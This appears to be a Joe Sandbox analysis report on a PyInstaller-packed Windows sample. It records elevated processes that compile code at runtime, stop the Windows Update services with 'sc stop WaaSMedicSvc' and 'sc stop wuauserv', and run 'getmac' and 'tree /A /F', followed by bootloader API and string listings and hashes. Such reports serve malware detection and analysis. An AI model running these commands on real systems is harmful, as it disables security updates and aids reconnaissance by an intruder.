Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.cmdline"
Imagebase:	0x7ff6abd40000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff738e80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBF6.tmp" "c:\Users\user\AppData\Local\Temp\sirtu5ev\CSCD8A1CC3D1CE048959A397DAF8AF51474.TMP"
Imagebase:	0x7ff658b90000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.cmdline"
Imagebase:	0x7ff6abd40000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	10:50:16
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	10:50:17
Start date:	02/09/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff738e80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	10:50:17
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	10:50:17
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	10:50:17
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	10:50:17
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	10:50:17
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBDBB.tmp" "c:\Windows\System32\CSC8CDC9FB2323C4007AF66CC17D2144E5.TMP"
Imagebase:	0x7ff658b90000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	10:50:17
Start date:	02/09/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff624380000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	10:50:17
Start date:	02/09/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6b3440000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	146
Start time:	10:50:22
Start date:	02/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	154
Start time:	10:50:23
Start date:	02/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	175
Start time:	10:50:36
Start date:	02/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	186
Start time:	10:51:05
Start date:	02/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	201
Start time:	10:51:06
Start date:	02/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	211
Start time:	10:51:07
Start date:	02/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	216
Start time:	10:51:07
Start date:	02/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	29

Executed Functions

Function 00007FF72B8D89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B8D9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B8D45F4,00000000,00007FF72B8D1985), ref: 00007FF72B8D93C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8A56

Part of subcall function 00007FF72B8EA47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8EA490

Part of subcall function 00007FF72B8E871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E8783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8AE6
CreateProcessW.KERNELBASE ref: 00007FF72B8D8B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8B28

Part of subcall function 00007FF72B8D2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2C9E
Part of subcall function 00007FF72B8D2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2D63
Part of subcall function 00007FF72B8D2C50: MessageBoxW.USER32 ref: 00007FF72B8D2D99

RegisterClassW.USER32 ref: 00007FF72B8D8B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8B8B
CreateWindowExW.USER32 ref: 00007FF72B8D8BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8C15
PeekMessageW.USER32 ref: 00007FF72B8D8C39
TranslateMessage.USER32 ref: 00007FF72B8D8C47
DispatchMessageW.USER32 ref: 00007FF72B8D8C51
PeekMessageW.USER32 ref: 00007FF72B8D8C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8E04
GetExitCodeProcess.KERNELBASE ref: 00007FF72B8D8E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8E2F

Strings

CreateProcessW, xrefs: 00007FF72B8D8B37
Failed to create child process!, xrefs: 00007FF72B8D8B30
PyInstallerOnefileHiddenWindow, xrefs: 00007FF72B8D8B54
PyInstaller Onefile Hidden Window, xrefs: 00007FF72B8D8B95

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: bcedf4e03391b491b483d5a43267f410f0ebafc7b37e578fb140d2408f0e0737
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: FFD17531A08A8286E710AF78EC542ADB764FF94B58FD00235DA5D436B4DF3CE565CBA0

Function 00007FF72B8D1000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF72B8D3A0B, 00007FF72B8D3CD4, 00007FF72B8D3F63
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF72B8D3EB3
MEI, xrefs: 00007FF72B8D3933
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF72B8D39DE
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF72B8D3D35
VCRUNTIME140.dll, xrefs: 00007FF72B8D3DA9
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF72B8D3971
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF72B8D3D12
pyi-contents-directory, xrefs: 00007FF72B8D3B8D
pyi-disable-windowed-traceback, xrefs: 00007FF72B8D3BB2
Failed to remove temporary directory: %s, xrefs: 00007FF72B8D3FC7
pkg, xrefs: 00007FF72B8D39BE
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF72B8D3882, 00007FF72B8D38AF
Could not create temporary directory!, xrefs: 00007FF72B8D3CBF
_PYI_SPLASH_IPC, xrefs: 00007FF72B8D3A23, 00007FF72B8D3EED
Failed to start splash screen!, xrefs: 00007FF72B8D3ECC
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF72B8D3C61
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF72B8D3E02
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF72B8D3B32
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF72B8D3A17, 00007FF72B8D3A2F, 00007FF72B8D3A9B
_PYI_ARCHIVE_FILE, xrefs: 00007FF72B8D38D2, 00007FF72B8D39FF
Failed to load splash screen resources!, xrefs: 00007FF72B8D3E7D
pyi-python-flag, xrefs: 00007FF72B8D3AD6
Failed to convert DLL search path!, xrefs: 00007FF72B8D3DD4
pyi-runtime-tmpdir, xrefs: 00007FF72B8D3B68
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF72B8D3E9E
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF72B8D3BE8
Py_GIL_DISABLED, xrefs: 00007FF72B8D3AF4

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: c6ecf53b68ee2dd9bba2ddfd6425f8d40bb22f0621e833bf64d9fc2c2c20c59c
Instruction ID: d85930d1f800096ed080bd59ec409818a2990b87a661af296c31cf9fdb8b62ed
Opcode Fuzzy Hash: c6ecf53b68ee2dd9bba2ddfd6425f8d40bb22f0621e833bf64d9fc2c2c20c59c
Instruction Fuzzy Hash: 57326C21A0C68391EA15BB399C543B9A661EF55780FC48037DA4D436E6EF2CF578CBA0

Function 00007FF72B8F6964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B8F6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F66D9
Part of subcall function 00007FF72B8F6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F6757
Part of subcall function 00007FF72B8F6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F67A8

CreateFileW.KERNELBASE ref: 00007FF72B8F6A6A
CreateFileW.KERNEL32 ref: 00007FF72B8F6ABA
GetLastError.KERNEL32 ref: 00007FF72B8F6AEA
GetFileType.KERNELBASE ref: 00007FF72B8F6AFF
GetLastError.KERNEL32 ref: 00007FF72B8F6B09
CloseHandle.KERNEL32 ref: 00007FF72B8F6B3C
CloseHandle.KERNEL32 ref: 00007FF72B8F6C9F
CreateFileW.KERNEL32 ref: 00007FF72B8F6CD4
GetLastError.KERNEL32 ref: 00007FF72B8F6CE3

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: 68b01a4094e01a038931819906fa1fbeff0445e3d0d5c72f6f3d180015639732
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: 01C1D532B24A4285EB10EFA9C8912AC7761F759B98F851335DE1E577E4CF38E061CB90

Function 00007FF72B8D83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D842B
RemoveDirectoryW.KERNEL32(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D84AE
DeleteFileW.KERNELBASE(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D84CD
FindNextFileW.KERNELBASE(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D84DB
FindClose.KERNEL32(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D84EC
RemoveDirectoryW.KERNELBASE(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D84F5

Strings

%s\*, xrefs: 00007FF72B8D83F2

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: 50d07c466ba77fe80cad4c953981ff8248afde4b5084e10f3885c26066f5d6b1
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: 5A411321A1C54395EA20BB78EC545FAA361FB94B54FC00233D69D426A4EF3CF5558FA0

Function 00007FF72B8D9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF72B8D92B3
FindClose.KERNELBASE ref: 00007FF72B8D92C2

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: dc15e4296e294a6dc4e00f563f9e6b041f4818ca06bd39d5e81d0675c77d0aaa
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: BAF04462A1864386F7609B68B899766B350EB84764FC40336DA7D026E4DF3CD0598F54

Function 00007FF72B8D1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B8D7F90: _fread_nolock.LIBCMT ref: 00007FF72B8D803A

_fread_nolock.LIBCMT ref: 00007FF72B8D1A1B

Part of subcall function 00007FF72B8D2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72B8D1B6A), ref: 00007FF72B8D295E

Strings

fseek, xrefs: 00007FF72B8D19F5
Failed to read cookie!, xrefs: 00007FF72B8D1A2B
Could not allocate buffer for TOC!, xrefs: 00007FF72B8D1B1B
Error on file., xrefs: 00007FF72B8D1B8D
Failed to seek to cookie position!, xrefs: 00007FF72B8D19EE
Could not allocate memory for archive structure!, xrefs: 00007FF72B8D1A61
MEI, xrefs: 00007FF72B8D1991
Could not read full TOC!, xrefs: 00007FF72B8D1B55
fread, xrefs: 00007FF72B8D1A32, 00007FF72B8D1B5C
malloc, xrefs: 00007FF72B8D1B22
calloc, xrefs: 00007FF72B8D1A68

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 85af813c0b0c69426d4f81882584102d3122cb9bfe94396efcbe029e9c31af02
Instruction ID: dc880a681ca35c9639bdb24bc76be4603b3a6ccfab25fe4b81d02fd5faeba3dc
Opcode Fuzzy Hash: 85af813c0b0c69426d4f81882584102d3122cb9bfe94396efcbe029e9c31af02
Instruction Fuzzy Hash: 7181B871A0C68785EB10FB2DD8416B9A3A0EF48784FC44532E98D477A5DE3CE5A58FA0

Function 00007FF72B8D1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fseek, xrefs: 00007FF72B8D16E1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B8D16DA
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF72B8D1742
Failed to extract %s: failed to open target file!, xrefs: 00007FF72B8D165C
fwrite, xrefs: 00007FF72B8D17D1
fread, xrefs: 00007FF72B8D17E6
malloc, xrefs: 00007FF72B8D1749
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B8D17DF
fopen, xrefs: 00007FF72B8D1663
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF72B8D17CA
Failed to create symbolic link %s!, xrefs: 00007FF72B8D1622
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B8D16A2

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
